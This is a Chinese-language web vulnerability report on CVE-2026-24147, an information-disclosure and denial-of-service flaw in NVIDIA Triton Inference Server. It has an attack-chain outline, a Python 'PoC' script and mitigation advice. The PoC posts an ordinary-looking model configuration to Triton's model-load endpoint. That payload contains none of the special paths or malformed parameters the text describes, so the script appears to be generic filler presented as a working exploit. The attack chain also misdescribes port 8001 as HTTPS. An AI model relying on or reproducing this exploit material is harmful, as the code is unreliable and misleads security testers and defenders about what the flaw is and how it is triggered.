IPBUF安全漏洞报告
English
CVE-2026-24147 CVSS 4.8 中危

CVE-2026-24147 NVIDIA Triton信息泄露漏洞

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-24147
漏洞类型
信息泄露
CVSS评分
4.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
NVIDIA Triton Inference Server

相关标签

信息泄露拒绝服务NVIDIATriton Inference ServerCVE-2026-24147

漏洞概述

NVIDIA Triton Inference Server在处理模型配置时存在安全漏洞。攻击者可通过上传特制的模型配置文件利用此漏洞,无需身份认证即可触发。成功利用该漏洞可能导致服务器敏感信息泄露,或引发拒绝服务,从而影响系统的可用性与数据机密性。

技术细节

该漏洞源于NVIDIA Triton Inference Server对上传的模型配置文件解析逻辑存在缺陷。攻击者可以通过网络向服务器发送恶意设计的模型配置文件。由于系统在解析配置时未对特定参数或路径进行充分的安全校验,攻击者可利用此行为读取服务器上的敏感文件,或通过构造异常数据导致服务进程崩溃。CVSS 3.1向量为AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L,表明攻击无需权限且无交互,但利用复杂度较高,主要影响机密性和可用性。

攻击链分析

STEP 1
侦察
攻击者扫描网络,发现暴露在互联网上的NVIDIA Triton Inference Server服务,通常监听在8000(HTTP)或8001(HTTPS)端口。
STEP 2
武器化
攻击者构造恶意的模型配置文件,该文件包含旨在泄露信息的特殊路径或导致服务崩溃的畸形参数。
STEP 3
投递
攻击者无需认证,直接向Triton服务器的模型仓库上传或加载接口发送包含恶意配置的HTTP POST请求。
STEP 4
利用
Triton服务器解析恶意配置文件,由于存在漏洞,解析过程触发异常逻辑,读取本地文件或消耗过多资源。
STEP 5
影响
攻击者成功获取服务器上的敏感信息,或者导致Triton服务挂起/崩溃,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL for Triton Inference Server model repository # Note: The actual endpoint may vary based on configuration target_host = "http://127.0.0.1:8000" endpoint = "/v2/repository/models/exploit_model/load" # Malicious model configuration payload # This payload attempts to trigger information disclosure or DoS # Structure simulates a Triton model config cfg_data = """ name: "exploit_model" platform: "onnxruntime_onnx" max_batch_size: 16 input [ { name: "input" data_type: TYPE_FP32 dims: [ 3, -1, -1 ] } ] output [ { name: "output" data_type: TYPE_FP32 dims: [ 1000 ] } ] instance_group [ { kind: KIND_GPU count: 1 gpus: [ 0 ] } ] """ # Headers headers = { "Accept": "application/json" } # Data payload data = { "config": cfg_data } try: print(f"[*] Attempting to exploit {target_host}{endpoint}...") response = requests.post(target_host + endpoint, data=json.dumps(data), headers=headers) if response.status_code == 200: print("[+] Request sent successfully. Check server for potential information disclosure or crash.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

NVIDIA Triton Inference Server (具体受影响版本请参考NVIDIA安全公告)

防御指南

临时缓解措施
建议立即限制对模型上传和加载接口的网络访问权限,仅允许授权的源IP进行操作。同时,应密切监控服务器日志,查看是否存在异常的配置上传请求或服务崩溃记录。在应用官方补丁前,请勿在不可信网络环境下暴露Triton服务。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表